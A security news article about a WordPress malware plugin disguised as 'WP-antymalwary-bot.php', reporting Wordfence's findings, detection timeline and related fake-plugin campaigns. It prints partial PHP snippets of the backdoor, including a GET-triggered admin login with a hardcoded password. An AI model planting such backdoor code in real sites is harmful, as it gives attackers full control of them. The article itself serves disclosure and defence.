In a recent discovery that raises serious alarms for WordPress users, cybersecurity researcher Marco Wotschka uncovered a dangerous new malware variant cleverly disguised as a legitimate WordPress plugin. The malware, reported first on January 22, 2025, was found by Wordfence analysts during a routine site cleanup.
Marco Wotschka, known for his detailed work in analyzing WordPress-based threats, found that the infected file appeared under the deceptive name WP-antymalwary-bot.php. While it looks like a regular plugin file, the code embedded inside is capable of granting backdoor access to hackers, hiding itself from the admin dashboard, and running remote code via the WordPress REST API.
Learn how to protect your store from WooCommerce fake security alerts in this detailed malware removal guide.
A REST API is an application programming interface (API) that conforms to the design principles of the representational state transfer (REST) architectural style, a style used to connect distributed hypermedia systems.
What Marco Wotschka Found in His Research
Through his intense research, Marco Wotschka revealed that the plugin doesn’t raise suspicion at first glance. It has all the typical characteristics of a well-coded plugin – clean formatting, a standard comment header, and no obvious malicious code at the top. But beneath the surface, it’s a highly dangerous tool.
Among the malicious functions discovered:
- Hidden Access Checks: A function called
check_special_linklets attackers check if the plugin is active using aGETrequest. - Emergency Admin Login: Another function called
emergency_login_all_adminsgrants admin-level access to attackers when used with a specific parameter and password. - Remote Code Execution (RCE): The plugin exposes a REST API endpoint that allows attackers to execute arbitrary admin commands without any permission checks.
These features allow the attacker to fully control the site, inject ads via malicious JavaScript, and even replicate the malware across other directories.
Wordfence’s Response and Protection Timeline
The team at Wordfence responded quickly. A malware signature was developed by January 24, just two days after discovery. It was released to premium users immediately and made available to free users after the standard 30-day delay.
In addition to the signature, Wordfence released a firewall rule on April 23, 2025, giving users of Wordfence Premium, Care, and Response real-time protection against execution of the infected plugin. Free users will get this coverage starting May 23, 2025.
Marco Wotschka’s research contributed significantly to updating Wordfence’s Threat Intelligence Database, which now houses over 4.3 million malware samples. Wordfence’s CLI tool and plugin scanner can detect over 99% of these when premium signatures are used.
Detailed Code Analysis: What Makes This Malware Unique?
Marco points out the malware’s similarities to AI-generated malicious code from a supply chain attack reported earlier. Features such as partially implemented functions, evolution over time, and code obfuscation suggest a high level of sophistication.
Here’s a glimpse into the kind of suspicious code included in the plugin:
// Check plugin status
function check_special_link() {
if (isset($_GET['check_plugin'])) {
...
echo json_encode(['status' => 'active']);
exit;
}
}
add_action('init', 'check_special_link');
And for admin access:
// Emergency login
function emergency_login_all_admins() {
if (isset($_GET['emergency_login']) && $_GET['password'] == 'secret_password') {
...
// Logs in attacker as admin
}
}
add_action('init', 'emergency_login_all_admins');
Neither of these functions includes security checks, which makes them vulnerable to misuse by anyone with the correct URL and password.
2024’s Fake Plugin Scams: Balada Injector & ClickFix Malware Exploits
Fake WordPress plugins are nothing new, they’ve been a recurring threat for years, deceiving website administrators and spreading malware. The trend continued in 2024, with cybercriminals using stolen credentials to infiltrate WordPress sites and distribute malicious plugins.
One major campaign involved ClickFix fake browser updates, where attackers injected harmful JavaScript into compromised sites. This malware tricked users into downloading remote access trojans and info stealers like Vidar Stealer and Lumma Stealer. Another widespread attack saw bogus WordPress plugins infecting over 6,000 sites, using deceptive names like “Advanced User Manager” and “Quick Cache Cleaner” to appear legitimate while secretly delivering malware
Final Words by Marco Wotschka
Marco Wotschka emphasizes that this malware highlights how dangerous it is to install unverified plugins – even ones that look perfectly legitimate. His research stresses the importance of monitoring server logs for suspicious GET requests and keeping malware signatures up to date.
His final advice: “Always run malware scans with tools like Wordfence CLI, especially if your WordPress dashboard is inaccessible. Prevention is critical, but response is essential.”
